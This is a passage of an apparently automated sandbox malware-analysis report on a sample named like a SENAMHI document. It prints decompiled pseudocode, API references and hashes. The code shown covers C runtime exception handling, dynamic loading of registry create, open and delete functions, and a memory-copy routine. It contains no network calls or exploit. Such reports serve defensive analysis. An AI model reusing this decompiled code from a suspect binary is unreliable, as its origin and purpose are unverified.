																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t327 = _v40;
																				_t314 = _v36;
																				__eflags = _t327;
																				if(_t327 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t299);
																						_push( *_t314);
																						_t254 =  &_v84;
																						_push(_t254);
																						L87();
																						_t332 = _t332 + 0xc;
																						__eflags = _t254;
																						if(_t254 != 0) {
																							break;
																						}
																						_t299 = _t270[0x1c];
																						_t327 = _t327 - 1;
																						_t314 = _t314 + 4;
																						__eflags = _t327;
																						if(_t327 > 0) {
																							continue;
																						} else {
																							_t294 = _v20;
																							_t253 = _v24;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E00156091(_t299, _t270, _a8, _v8, _a16, _a20,  &_v84,  *_t314,  &_v104, _a28, _a32);
																					_t332 = _t332 + 0x30;
																				}
																				L43:
																				_t296 = _v16;
																				goto L44;
																				L40:
																				_t294 = _t294 + 1;
																				_t253 = _t253 + 0x10;
																				_v20 = _t294;
																				_v24 = _t253;
																				__eflags = _t294 - _v92;
																			} while (_t294 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t296 = _t296 + 1;
																_t247 = _v44;
																_t290 = _v32 + 0x14;
																_v16 = _t296;
																_v32 = _t290;
																__eflags = _t296 - _v56;
															} while (_t296 < _v56);
															_t301 = _a20;
															_t315 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E0015536A(_t270, _t301, _t315, __eflags);
														_t275 = _t270;
													}
													__eflags = ( *_t301 & 0x1fffffff) - 0x19930521;
													if(( *_t301 & 0x1fffffff) < 0x19930521) {
														L60:
														_t224 = E00155DCC(_t270, _t275, _t296, _t301, _t315);
														__eflags =  *(_t224 + 0x1c);
														if( *(_t224 + 0x1c) != 0) {
															goto L67;
														} else {
															goto L61;
														}
													} else {
														_t228 = _t301[8] >> 2;
														__eflags = _t301[7];
														if(_t301[7] != 0) {
															__eflags = _t228 & 0x00000001;
															if((_t228 & 0x00000001) == 0) {
																_push(_t301[7]);
																_t229 = E00156B26(_t270, _t301, _t315, _t270);
																_pop(_t275);
																__eflags = _t229;
																if(_t229 == 0) {
																	goto L64;
																} else {
																	goto L60;
																}
															} else {
																goto L54;
															}
														} else {
															__eflags = _t228 & 0x00000001;
															if((_t228 & 0x00000001) == 0) {
																goto L60;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L60;
																} else {
																	L54:
																	 *(E00155DCC(_t270, _t275, _t296, _t301, _t315) + 0x10) = _t270;
																	_t237 = E00155DCC(_t270, _t275, _t296, _t301, _t315);
																	_t286 = _v8;
																	 *((intOrPtr*)(_t237 + 0x14)) = _v8;
																	goto L62;
																}
															}
														}
													}
												} else {
													__eflags = _t270[0x14] - 0x19930521;
													if(_t270[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t270[0x14] - 0x19930522;
														if(_t270[0x14] != 0x19930522) {
															goto L57;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E00155DCC(_t270, _t275, _t296, _t301, _t315) + 0x1c));
										_t264 = E00155DCC(_t270, _t275, _t296, _t301, _t315);
										_push(_v16);
										 *(_t264 + 0x1c) = _t315;
										_t265 = E00156B26(_t270, _t301, _t315, _t270);
										_pop(_t286);
										if(_t265 != 0) {
											goto L23;
										} else {
											_t301 = _v16;
											_t353 =  *_t301 - _t315;
											if( *_t301 <= _t315) {
												L62:
												E0015783D(_t270, _t286, _t296, _t301, _t315, __eflags);
											} else {
												while(1) {
													_t286 =  *((intOrPtr*)(_t315 + _t301[1] + 4));
													if(E001567AF( *((intOrPtr*)(_t315 + _t301[1] + 4)), _t353, 0x292230) != 0) {
														goto L63;
													}
													_t315 = _t315 + 0x10;
													_t269 = _v20 + 1;
													_v20 = _t269;
													_t353 = _t269 -  *_t301;
													if(_t269 >=  *_t301) {
														goto L62;
													} else {
														continue;
													}
													goto L63;
												}
											}
											L63:
											_push(1);
											_push(_t270);
											E0015536A(_t270, _t301, _t315, __eflags);
											_t275 =  &_v64;
											E00156797( &_v64);
											E00155D44( &_v64, 0x1670d4);
											L64:
											 *(E00155DCC(_t270, _t275, _t296, _t301, _t315) + 0x10) = _t270;
											_t231 = E00155DCC(_t270, _t275, _t296, _t301, _t315);
											_t275 = _v8;
											 *(_t231 + 0x14) = _v8;
											__eflags = _t315;
											if(_t315 == 0) {
												_t315 = _a8;
											}
											E00155049(_t275, _t315, _t270);
											E00156A26(_a8, _a16, _t301);
											_t234 = E00156BE3(_t301);
											_t332 = _t332 + 0x10;
											_push(_t234);
											E0015699D(_t270, _t275, _t296, _t301, _t315, __eflags);
											goto L67;
										}
									}
								}
							}
						}
					}
				}
			}

0x00156111
0x00156118
0x0015611a
0x00156123
0x00156129
0x00156131
0x00156133
0x00156136
0x0015613c
0x001564b0
0x001564b0
0x001564b5
0x001564b7
0x001564b9
0x001564bc
0x001564bd
0x001564c0
0x001564c6
0x001565e5
0x001564cc
0x001564cc
0x001564cd
0x001564ce
0x001564d5
0x001564d8
0x001564db
0x001564e1
0x001564e3
0x001564e8
0x001564eb
0x001564ed
0x001564f3
0x001564f5
0x001564fb
0x00156510
0x00156515
0x00156518
0x0015651a
0x001565e1
0x00000000
0x001565e2
0x0015651a
0x001564fb
0x001564f3
0x001564eb
0x00156520
0x00156523
0x00156526
0x00156529
0x0015652c
0x00156532
0x00156544
0x00156549
0x0015654c
0x0015654f
0x00156552
0x00156555
0x00156558
0x0015655b
0x00000000
0x00000000
0x00156561
0x00156561
0x00156564
0x00156567
0x00156576
0x00156577
0x00156577
0x00156579
0x0015657c
0x00000000
0x00000000
0x0015657e
0x00156581
0x00000000
0x00000000
0x0015658f
0x00156591
0x00156594
0x00156596
0x0015659e
0x0015659e
0x001565a1
0x001565a3
0x001565a5
0x001565c1
0x001565c6
0x001565c9
0x001565c9
0x00000000
0x001565a1
0x00156598
0x0015659c
0x00000000
0x00000000
0x00000000
0x001565cc
0x001565cf
0x001565d0
0x001565d3
0x001565d6
0x001565d9
0x001565dc
0x001565dc
0x00000000
0x00156567
0x001565e6
0x001565eb
0x001565ec
0x001565ef
0x001565f2
0x001565f3
0x001565f4
0x001565f5
0x001565f8
0x001565fa
0x00156672
0x00156674
0x00156674
0x001565fc
0x001565fc
0x001565ff
0x00156602
0x00000000
0x00156604
0x00156604
0x00156607
0x0015660a
0x00156611
0x00156611
0x00156614
0x00156616
0x00156618
0x0015664a
0x0015664a
0x0015664d
0x00156654
0x00156654
0x00156657
0x0015665a
0x00156661
0x00156661
0x00156664
0x0015666b
0x0015666d
0x0015666d
0x00156666
0x00156666
0x00156669
0x00000000
0x00000000
0x00156669
0x0015665c
0x0015665c
0x0015665f
0x00000000
0x00000000
0x0015665f
0x0015664f
0x0015664f
0x00156652
0x00000000
0x00000000
0x00156652
0x0015666e
0x0015661a
0x0015661a
0x0015661a
0x0015661d
0x0015661d
0x0015661f
0x00156621
0x00000000
0x00000000
0x00156623
0x00156625
0x00156639
0x00156639
0x00156627
0x00156627
0x0015662a
0x0015662d
0x00000000
0x0015662f
0x0015662f
0x00156632
0x00156635
0x00156637
0x00000000
0x00000000
0x00000000
0x00000000
0x00156637
0x0015662d
0x00156642
0x00156642
0x00156644
0x00000000
0x00156646
0x00156646
0x00156646
0x00000000
0x00156644
0x0015663d
0x0015663f
0x0015663f
0x00000000
0x0015663f
0x0015660c
0x0015660c
0x0015660f
0x00000000
0x00000000
0x00000000
0x00000000
0x0015660f
0x0015660a
0x00156602
0x00156675
0x00156679
0x00156679
0x0015614b
0x0015614b
0x00156154
0x00156251
0x00156251
0x00156254
0x00000000
0x00156183
0x00156183
0x00156188
0x00000000
0x0015618e
0x0015618e
0x00156196
0x0015644a
0x0015644e
0x0015619c
0x001561a1
0x001561a4
0x001561a9
0x001561b0
0x001561b5
0x00000000
0x001561ed
0x001561f5
0x00156259
0x00156259
0x0015625c
0x0015625f
0x00156261
0x00156264
0x00156267
0x0015626d
0x00156419
0x00156419
0x0015641c
0x00000000
0x0015641e
0x0015641e
0x00156421
0x00000000
0x00156427
0x00156427
0x0015642a
0x0015642d
0x0015642e
0x0015642f
0x00156432
0x00156433
0x00156436
0x00156437
0x0015643c
0x00000000
0x0015643c
0x00156421
0x00156273
0x00156273
0x00156277
0x00000000
0x0015627d
0x0015627d
0x00156284
0x0015629c
0x0015629c
0x0015629f
0x001562a2
0x001562a8
0x001562b8
0x001562bd
0x001562c0
0x001562c3
0x001562c6
0x001562c9
0x001562cc
0x001562cf
0x001562d5
0x001562d5
0x001562d8
0x001562db
0x001562ea
0x001562eb
0x001562eb
0x001562ed
0x001562f0
0x001562f6
0x001562f9
0x001562ff
0x00156301
0x00156304
0x00156307
0x0015630d
0x00156310
0x00156315
0x00156315
0x00156318
0x0015631b
0x0015631e
0x00156321
0x00156324
0x00156329
0x0015632a
0x0015632b
0x0015632c
0x0015632d
0x00156330
0x00156333
0x00156335
0x00000000
0x00156337
0x00156337
0x00156337
0x00156338
0x0015633a
0x0015633d
0x0015633e
0x00156343
0x00156346
0x00156348
0x00000000
0x00000000
0x0015634a
0x0015634d
0x0015634e
0x00156351
0x00156353
0x00000000
0x00156355
0x00156355
0x00156358
0x00000000
0x00156358
0x00000000
0x00156353
0x0015636c
0x00156372
0x0015638f
0x00156394
0x00156394
0x00156397
0x00156397
0x00000000
0x0015635b
0x0015635b
0x0015635c
0x0015635f
0x00156362
0x00156365
0x00156365
0x00000000
0x0015636a
0x00156307
0x001562f9
0x0015639a
0x0015639d
0x0015639e
0x001563a1
0x001563a4
0x001563a7
0x001563aa
0x001563aa
0x001563b3
0x001563b6
0x001563b6
0x001562cf
0x001563b9
0x001563bd
0x001563bf
0x001563c2
0x001563c8
0x001563c8
0x001563d0
0x001563d5
0x0015643f
0x0015643f
0x00156444
0x00156448
0x00000000
0x00000000
0x00000000
0x00000000
0x001563d7
0x001563da
0x001563dd
0x001563e1
0x001563ef
0x001563f1
0x00156408
0x0015640c
0x00156412
0x00156413
0x00156415
0x00000000
0x00156417
0x00000000
0x00156417
0x00000000
0x00000000
0x00000000
0x001563e3
0x001563e3
0x001563e5
0x00000000
0x001563e7
0x001563e7
0x001563eb
0x00000000
0x001563ed
0x001563f3
0x001563f8
0x001563fb
0x00156400
0x00156403
0x00000000
0x00156403
0x001563eb
0x001563e5
0x001563e1
0x00156286
0x00156286
0x0015628d
0x00000000
0x0015628f
0x0015628f
0x00156296
0x00000000
0x00000000
0x00000000
0x00000000
0x00156296
0x0015628d
0x00156284
0x00156277
0x001561f7
0x001561ff
0x00156202
0x00156207
0x0015620b
0x0015620e
0x00156214
0x00156217
0x00000000
0x00156219
0x00156219
0x0015621c
0x0015621e
0x0015644f
0x0015644f
0x00000000
0x00156224
0x0015622c
0x00156237
0x00000000
0x00000000
0x00156240
0x00156243
0x00156244
0x00156247
0x00156249
0x00000000
0x0015624f
0x00000000
0x0015624f
0x00000000
0x00156249
0x00156224
0x00156454
0x00156454
0x00156456
0x00156457
0x0015645e
0x00156461
0x0015646f
0x00156474
0x00156479
0x0015647c
0x00156481
0x00156484
0x00156487
0x00156489
0x0015648b
0x0015648b
0x00156490
0x0015649c
0x001564a2
0x001564a7
0x001564aa
0x001564ab
0x00000000
0x001564ab
0x00156217
0x001561f5
0x001561b5
0x00156196
0x00156188
0x00156154

APIs

type_info::operator==.LIBVCRUNTIME ref: 00156230
___TypeMatch.LIBVCRUNTIME ref: 0015633E
_UnwindNestedFrames.LIBCMT ref: 00156490
CallUnexpected.LIBVCRUNTIME ref: 001564AB

Strings

csm, xrefs: 0015614E
csm, xrefs: 00156267
csm, xrefs: 001561BB

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 58fc21a9e581edf31a5922e6bdebd823e68494aeb1023141f1e445bfb067cbe6
Instruction ID: 70b29c0594e20dedc742907d65b82729a20e86fbd66300978f3d12df82ba80d7
Opcode Fuzzy Hash: 58fc21a9e581edf31a5922e6bdebd823e68494aeb1023141f1e445bfb067cbe6
Instruction Fuzzy Hash: D9B16A71800209EFCF24DFA4C8819AEBBB5BF54316F94415AEC256F212D731DA59CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00151348 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 49
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00151348(intOrPtr* __ecx, void* _a4, char* _a8, void** _a32, int* _a36) {
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t14;
				intOrPtr* _t18;

				_t18 = __ecx;
				if( *__ecx == 0) {
					if( *((intOrPtr*)(__ecx + 4)) == 0) {
						L6:
						return 1;
					}
					return RegCreateKeyExA(_a4, _a8, 0, 0, 0, 0x2001f, 0, _a32, _a36);
				}
				_t13 = GetModuleHandleA("Advapi32.dll");
				if(_t13 == 0) {
					goto L6;
				}
				_t14 = GetProcAddress(_t13, "RegCreateKeyTransactedA");
				if(_t14 == 0) {
					goto L6;
				}
				return  *_t14(_a4, _a8, 0, 0, 0, 0x2001f, 0, _a32, _a36,  *_t18, 0);
			}

0x0015134c
0x00151353
0x00151393
0x001513b2
0x00000000
0x001513b4
0x00000000
0x001513aa
0x0015135a
0x00151362
0x00000000
0x00000000
0x0015136a
0x00151372
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 0015135A
GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedA), ref: 0015136A
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 001513AA

Strings

Advapi32.dll, xrefs: 00151355
Nv, xrefs: 0015136A
Mv@Nv, xrefs: 0015135A
RegCreateKeyTransactedA, xrefs: 00151364

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: AddressCreateHandleModuleProc
String ID: Advapi32.dll$RegCreateKeyTransactedA$Mv@Nv$Nv
API String ID: 1964897782-236308291
Opcode ID: 3cecdf0abf9d0490ed6dd7be11530901217fe356bc15691bbd3bd513c9f46b42
Instruction ID: 38c8f1fb777ad3fce2f025e4be0bbf1027548f4f2ae9b66c8e8f60ba20970dbb
Opcode Fuzzy Hash: 3cecdf0abf9d0490ed6dd7be11530901217fe356bc15691bbd3bd513c9f46b42
Instruction Fuzzy Hash: E0011231100244FADF320F529C09D977E7DFBCAB627054229FE1994451D771D894EB60

Uniqueness

Uniqueness Score: -1.00%

Function 001512E5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 41
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E001512E5(intOrPtr* __ecx, void* _a4, char* _a8, int _a16, void** _a20) {
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t14;
				intOrPtr* _t18;

				_t18 = __ecx;
				if( *__ecx == 0) {
					if( *((intOrPtr*)(__ecx + 4)) == 0) {
						L6:
						return 1;
					}
					return RegOpenKeyExA(_a4, _a8, 0, _a16, _a20);
				}
				_t13 = GetModuleHandleA("Advapi32.dll");
				if(_t13 == 0) {
					goto L6;
				}
				_t14 = GetProcAddress(_t13, "RegOpenKeyTransactedA");
				if(_t14 == 0) {
					goto L6;
				}
				return  *_t14(_a4, _a8, 0, _a16, _a20,  *_t18, 0);
			}

0x001512e9
0x001512f0
0x00151328
0x0015133f
0x00000000
0x00151341
0x00000000
0x00151337
0x001512f7
0x001512ff
0x00000000
0x00000000
0x00151307
0x0015130f
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 001512F7
GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedA), ref: 00151307
RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00151337

Strings

Advapi32.dll, xrefs: 001512F2
Nv, xrefs: 00151307
Mv@Nv, xrefs: 001512F7
RegOpenKeyTransactedA, xrefs: 00151301

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: AddressHandleModuleOpenProc
String ID: Advapi32.dll$RegOpenKeyTransactedA$Mv@Nv$Nv
API String ID: 1337834000-2047141036
Opcode ID: 64ecb75b3c1fa5dbd3377f39b38cbda0ff1dc969ea43baadd4e21d4bb1865b13
Instruction ID: feedde5a84ba8f53a6d6ce73792dd9c9e90b0f0d65c85bcd5368b38cc5774af6
Opcode Fuzzy Hash: 64ecb75b3c1fa5dbd3377f39b38cbda0ff1dc969ea43baadd4e21d4bb1865b13
Instruction Fuzzy Hash: D7F06232100105FBCF621FA1DC09EAB7F7EFF85762B444029FD6195424D77288A1EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00151596 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00151596(void** __ecx, char* _a4) {
				_Unknown_base(*)()* _t6;
				struct HINSTANCE__* _t9;

				_t13 = __ecx;
				_t12 =  *((intOrPtr*)(__ecx + 8));
				if( *((intOrPtr*)(__ecx + 8)) == 0) {
					if( *0x292e00 != 0) {
						_t6 =  *0x292dfc; // 0x0
					} else {
						_t9 = GetModuleHandleA("Advapi32.dll");
						if(_t9 == 0) {
							_t6 =  *0x292dfc; // 0x0
						} else {
							_t6 = GetProcAddress(_t9, "RegDeleteKeyExA");
							 *0x292dfc = _t6;
						}
						 *0x292e00 = 1;
					}
					if(_t6 == 0) {
						return RegDeleteKeyA( *_t13, _a4);
					} else {
						return  *_t6( *_t13, _a4, _t13[1], 0);
					}
				}
				return E001513BB(_t12,  *((intOrPtr*)(__ecx)), _a4);
			}

0x0015159a
0x0015159c
0x001515a1
0x001515b6
0x001515e8
0x001515b8
0x001515bd
0x001515c5
0x001515da
0x001515c7
0x001515cd
0x001515d3
0x001515d3
0x001515df
0x001515df
0x001515ef
0x00000000
0x001515f1
0x00000000
0x001515fb
0x001515ef
0x00000000

APIs

GetModuleHandleA.KERNEL32(Advapi32.dll,00000000,?,0015339A,?), ref: 001515BD
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExA), ref: 001515CD

Part of subcall function 001513BB: GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 001513CD
Part of subcall function 001513BB: GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 001513DD

Strings

Advapi32.dll, xrefs: 001515B8
Nv, xrefs: 001515CD
RegDeleteKeyExA, xrefs: 001515C7
Mv@Nv, xrefs: 001515BD

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegDeleteKeyExA$Mv@Nv$Nv
API String ID: 1646373207-3533393476
Opcode ID: 7a5ce527a980ccc6fe93978b9d45e4500e32443ff07a068399441cbbed4753d4
Instruction ID: 251cfa97967e05a64e01f3dba6bbc9a84114045a6675871a623cf7347de97d78
Opcode Fuzzy Hash: 7a5ce527a980ccc6fe93978b9d45e4500e32443ff07a068399441cbbed4753d4
Instruction Fuzzy Hash: 8101D639114201FFDF128F61EC04B957BA6BB15383F04802BFD6389560DBB29958EB54

Uniqueness

Uniqueness Score: -1.00%

Function 00155570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00155570(void* __ebx, void* __ecx, intOrPtr __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				void* _v36;
				void* _v40;
				char* __edi;
				intOrPtr* __esi;
				int _t150;
				signed int _t157;
				intOrPtr _t158;
				void* _t159;
				intOrPtr* _t160;
				intOrPtr _t162;
				void* _t165;
				signed int _t167;
				void _t175;
				void _t176;
				int _t178;
				unsigned int _t179;
				int _t180;
				int _t191;
				intOrPtr* _t195;
				intOrPtr _t196;
				signed int _t200;
				char _t202;
				int _t206;
				unsigned int _t207;
				int _t208;
				int _t210;
				int _t215;
				signed int _t226;
				unsigned int _t230;
				int _t231;
				int _t233;
				signed int _t239;
				void* _t240;
				intOrPtr _t241;
				void* _t243;
				signed int _t251;
				intOrPtr _t258;
				void* _t260;
				void* _t263;
				void* _t264;
				void* _t265;
				intOrPtr* _t267;
				int _t271;
				void* _t275;
				void* _t277;
				void* _t287;

				_t221 = __edx;
				_t195 = _a4;
				_push(_t240);
				_v5 = 0;
				_v16 = 1;
				 *_t195 = E001606BB(__ecx,  *_t195);
				_t196 = _a8;
				_t6 = _t196 + 0x10; // 0x11
				_t258 = _t6;
				_push(_t258);
				_v20 = _t258;
				_v12 =  *(_t196 + 8) ^  *0x169008;
				E00155530(_t196, __edx, _t240, _t258,  *(_t196 + 8) ^  *0x169008);
				E00156C3C(_a12);
				_t150 = _a4;
				_t277 = _t275 - 0x1c + 0x10;
				_t241 =  *((intOrPtr*)(_t196 + 0xc));
				if(( *(_t150 + 4) & 0x00000066) != 0) {
					__eflags = _t241 - 0xfffffffe;
					if(_t241 != 0xfffffffe) {
						_t221 = 0xfffffffe;
						E00156DC0(_t196, 0xfffffffe, _t258, 0x169008);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t150;
					_v28 = _a12;
					 *((intOrPtr*)(_t196 - 4)) =  &_v32;
					if(_t241 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t200 = _v12;
							_t157 = _t241 + (_t241 + 2) * 2;
							_t196 =  *((intOrPtr*)(_t200 + _t157 * 4));
							_t158 = _t200 + _t157 * 4;
							_t201 =  *((intOrPtr*)(_t158 + 4));
							_v24 = _t158;
							if( *((intOrPtr*)(_t158 + 4)) == 0) {
								_t202 = _v5;
								goto L7;
							} else {
								_t221 = _t258;
								_t159 = E00156D60(_t201, _t258);
								_t202 = 1;
								_v5 = 1;
								_t287 = _t159;
								if(_t287 < 0) {
									_v16 = 0;
									L13:
									_push(_t258);
									E00155530(_t196, _t221, _t241, _t258, _v12);
									goto L14;
								} else {
									if(_t287 > 0) {
										_t160 = _a4;
										__eflags =  *_t160 - 0xe06d7363;
										if( *_t160 == 0xe06d7363) {
											__eflags =  *0x1613e4;
											if(__eflags != 0) {
												_t191 = E001600C0(__eflags, 0x1613e4);
												_t277 = _t277 + 4;
												__eflags = _t191;
												if(_t191 != 0) {
													_t271 =  *0x1613e4; // 0x15536a
													 *0x161278(_a4, 1);
													 *_t271();
													_t258 = _v20;
													_t277 = _t277 + 8;
												}
												_t160 = _a4;
											}
										}
										_t222 = _t160;
										E00156DA0(_t160, _a8, _t160);
										_t162 = _a8;
										__eflags =  *((intOrPtr*)(_t162 + 0xc)) - _t241;
										if( *((intOrPtr*)(_t162 + 0xc)) != _t241) {
											_t222 = _t241;
											E00156DC0(_t162, _t241, _t258, 0x169008);
											_t162 = _a8;
										}
										_push(_t258);
										 *((intOrPtr*)(_t162 + 0xc)) = _t196;
										E00155530(_t196, _t222, _t241, _t258, _v12);
										E00156D80();
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t241);
										_push(_t258);
										_t260 = _v36;
										_t206 = _v32;
										_t243 = _v40;
										_t165 = _t260 + _t206;
										__eflags = _t243 - _t260;
										if(_t243 <= _t260) {
											L25:
											__eflags = _t206 - 0x20;
											if(_t206 < 0x20) {
												L96:
												_t207 = _t206 & 0x0000001f;
												__eflags = _t207;
												if(_t207 != 0) {
													_t167 = _t207;
													_t208 = _t207 >> 2;
													__eflags = _t208;
													while(_t208 != 0) {
														 *_t243 =  *_t260;
														_t243 = _t243 + 4;
														_t260 = _t260 + 4;
														_t208 = _t208 - 1;
														__eflags = _t208;
													}
													_t210 = _t167 & 0x00000003;
													__eflags = _t210;
													while(_t210 != 0) {
														 *_t243 =  *_t260;
														_t260 = _t260 + 1;
														_t243 = _t243 + 1;
														_t210 = _t210 - 1;
														__eflags = _t210;
													}
												}
												goto L102;
											} else {
												__eflags = _t206 - 0x80;
												if(__eflags >= 0) {
													asm("bt dword [0x292728], 0x1");
													if(__eflags >= 0) {
														__eflags = (_t243 ^ _t260) & 0x0000000f;
														if(__eflags != 0) {
															L33:
															asm("bt dword [0x292728], 0x0");
															if(__eflags >= 0) {
																goto L58;
															} else {
																__eflags = _t243 & 0x00000003;
																if((_t243 & 0x00000003) != 0) {
																	goto L58;
																} else {
																	__eflags = _t260 & 0x00000003;
																	if(__eflags == 0) {
																		asm("bt edi, 0x2");
																		if(__eflags < 0) {
																			_t176 =  *_t260;
																			_t206 = _t206 - 4;
																			__eflags = _t206;
																			_t260 = _t260 + 4;
																			 *_t243 = _t176;
																			_t243 = _t243 + 4;
																		}
																		asm("bt edi, 0x3");
																		if(__eflags < 0) {
																			asm("movq xmm1, [esi]");
																			_t206 = _t206 - 8;
																			__eflags = _t206;
																			_t260 = _t260 + 8;
																			asm("movq [edi], xmm1");
																			_t243 = _t243 + 8;
																		}
																		__eflags = _t260 & 0x00000007;
																		if(__eflags == 0) {
																			asm("movdqa xmm1, [esi-0x8]");
																			_t263 = _t260 - 8;
																			do {
																				asm("movdqa xmm3, [esi+0x10]");
																				_t206 = _t206 - 0x30;
																				asm("movdqa xmm0, [esi+0x20]");
																				asm("movdqa xmm5, [esi+0x30]");
																				_t263 = _t263 + 0x30;
																				__eflags = _t206 - 0x30;
																				asm("movdqa xmm2, xmm3");
																				asm("palignr xmm3, xmm1, 0x8");
																				asm("movdqa [edi], xmm3");
																				asm("movdqa xmm4, xmm0");
																				asm("palignr xmm0, xmm2, 0x8");
																				asm("movdqa [edi+0x10], xmm0");
																				asm("movdqa xmm1, xmm5");
																				asm("palignr xmm5, xmm4, 0x8");
																				asm("movdqa [edi+0x20], xmm5");
																				_t243 = _t243 + 0x30;
																			} while (_t206 >= 0x30);
																			_t260 = _t263 + 8;
																		} else {
																			asm("bt esi, 0x3");
																			if(__eflags >= 0) {
																				asm("movdqa xmm1, [esi-0x4]");
																				_t264 = _t260 - 4;
																				do {
																					asm("movdqa xmm3, [esi+0x10]");
																					_t206 = _t206 - 0x30;
																					asm("movdqa xmm0, [esi+0x20]");
																					asm("movdqa xmm5, [esi+0x30]");
																					_t264 = _t264 + 0x30;
																					__eflags = _t206 - 0x30;
																					asm("movdqa xmm2, xmm3");
																					asm("palignr xmm3, xmm1, 0x4");
																					asm("movdqa [edi], xmm3");
																					asm("movdqa xmm4, xmm0");
																					asm("palignr xmm0, xmm2, 0x4");
																					asm("movdqa [edi+0x10], xmm0");
																					asm("movdqa xmm1, xmm5");
